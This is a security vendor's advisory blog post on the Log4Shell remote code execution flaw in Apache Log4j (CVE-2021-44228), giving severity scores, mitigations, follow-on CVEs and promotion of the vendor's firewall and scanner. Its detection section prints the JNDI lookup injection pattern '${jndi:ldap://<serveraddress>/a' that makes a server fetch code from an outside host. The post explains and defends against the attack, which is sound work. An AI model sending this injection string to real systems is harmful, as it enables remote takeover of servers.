Home Apache Log4j Remote Code Execution Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
Indusface

Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Apache Log4j Remote Code Execution Vulnerability

What is Apache Log4j Remote Code Execution (CVE-2021-44228) Vulnerability?

Log4j 2 is a logging library used in many Java applications and services. The library is part of the Apache Software Foundation’s Apache Logging Services project. A remote code execution vulnerability exists in Apache Log4j2 <=2.14.1 JNDI features where configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when the message lookup substitution is enabled. This vulnerability is also known as “Log4Shell”.

What Are the Risks?

A remote attacker can exploit the vulnerability without authentication and successful exploitation can grant full control of the victim’s system. This is known to be actively being exploited in the wild as the POCs are available in public.

Severity: Critical
CVSSv3.1: Base Score:10.0 CRITICAL Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv2: Base Score: 9.3 HIGH
Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)

Exploit available in public: Yes
Exploit complexity: Low

Do You Need to Worry About It?

The vendor has released the security patch and we strongly advise our customers to update their installations as soon as possible.

Mitigation Steps

1) Upgrade it to Log4j v2.15.0, vulnerability is patched from this version.
2) If you are using a vulnerable version and cannot upgrade, then set the below parameter:

log4j2.formatMsgNoLookups=true

Additionally, an environment variable can be set for all the affected versions:

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

3) Alternatively, the JndiLookup class can be removed with the help of similar command as below:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class to remove the class from the log4j-core.

Product Coverage:

Indusface AppTrana blocks exploits targeting the Log4J vulnerability (CVE-2021-44228) and customers behind AppTrana WAF are protected. We highly recommend customers still take the above-mentioned mitigation steps. Protection against this vulnerability was rolled out on Dec 11th.

Indusface WAS can now detect Log4j vulnerabilities. Given the nature of the vulnerability, the detection is out of band. This means, the scanner may inject the attack vector but it may not be called immediately, but called next time Log4j is used by your application. Due to this reporting of the vulnerability is out of band.

When the vulnerability is identified, a notification will show up in the portal informing which assets are compromised a mail will also be sent. A subsequent scan of the asset will update the report with additional details.

Further Details on Log4j Detection:

The vulnerability as already mentioned results from how log messages are handled by log4j processor. When an attacker passes a crafted message like ${jndi:ldap://<serveraddress>/a will result in calls to remote ldap server which can respond with a malicious code that can be executed in your server leading to successful remote code execution.

For detecting, if the application is vulnerable, the Indusface WAS scanner sends a crafted message to the application, if the application is vulnerable, the JNDI call will be made, which is tracked and logged. If the call is made, we know the application is vulnerable, our intent is to identify vulnerability so we do not respond back with a code and do a successful RCE, but we report that your server is vulnerable to an RCE exploit.

Successors of Log4jShell:

Apache announced another vulnerability in Log4j on Dec, 14th, 2021 and it is tracked as CVE-2021-45046. An attack can perform local denial of service attacks due to an incomplete patch for Log4jShell in certain non-default configurations. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default but the latest Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. We recommend customers upgrade it to the latest version of Log4j.

Also, researchers from Praetorian disclosed a third separate security weakness in Log4j 2.15.0 which can allow attackers to exfiltrate sensitive data in certain circumstances. Technical details or POC are not disclosed to the public as a part of responsible vulnerability disclosure. The vendor has not disclosed any details of the vulnerability & patch as of 16th Dec 2021.

Update on Feb 17: Coverage for Indusface WAS and details on Successor of Log4jShell.

Found this article interesting? Follow Indusface on FacebookTwitter, and LinkedIn to read more exclusive content we post.

Vivek Gopalan

Vivekanand Gopalan is a seasoned entrepreneur and currently serves as the Vice President of Products at Indusface. With over 12 years of experience in designing and developing technology products, he has a keen eye for building innovative solutions that solve real-life problems. In his previous role as a Product Manager at Druva, Vivek was instrumental in creating the core endpoint data protection solution which helped over 1500 enterprises protect over a million endpoints. Prior to that, he served as a Product Manager at Zighra, where he played a crucial role in reducing online and offline payment fraud by leveraging mobile telephony, collective intelligence, and implicit user authentication. Vivek is a dynamic leader who enjoys building and commercializing products that bring tangible value to customers. In 2010, before pursuing MBA, he co-founded a technology product company, Warmbluke and created a first-of-its-kind innovative Civil Engineering estimator software called ATLAS. The software was developed for both enterprise and for SaaS users. The product helps in estimating the construction cost using CAD drawings. Vivek did his MBA from Queen's University with Specialization in New Ventures. He also holds a Bachelor of Technology degree in Information Technology from Coimbatore Institute of Technology, Anna University, one of the prestigious universities in India. He is the recipient of the D.D. Monieson MBA Award, Issued by Queen's School of Business, presented to a student team which has embraced the team-learning model and applied the management tools and skills to become a peer exemplar. In his spare time, Vivek likes to go on hikes and read books.

This post was last modified on March 16, 2023 16:34

Share
Vivek Gopalan
Published by
Vivek Gopalan
Tags: Apache Log4j Remote Code Execution
2 years ago

Recent Posts

AWS WAF vs. AppTrana WAF

AWS WAF vs. AppTrana WAF compared: An analysis of features, advantages, and limitations of leading… Read More

2 days ago

11 Best Practices for Preventing Credential Stuffing Attacks

Learn how to prevent credential stuffing attacks with strong password policies, account lockout mechanisms, anomoly… Read More

4 days ago

Indusface Recognized as a 2024 Gartner® Peer Insights™ Customers’ Choice for Cloud WAAP

Indusface has once again been recognized as a Gartner® Peer Insights™ Customers' Choice for Cloud… Read More

2 weeks ago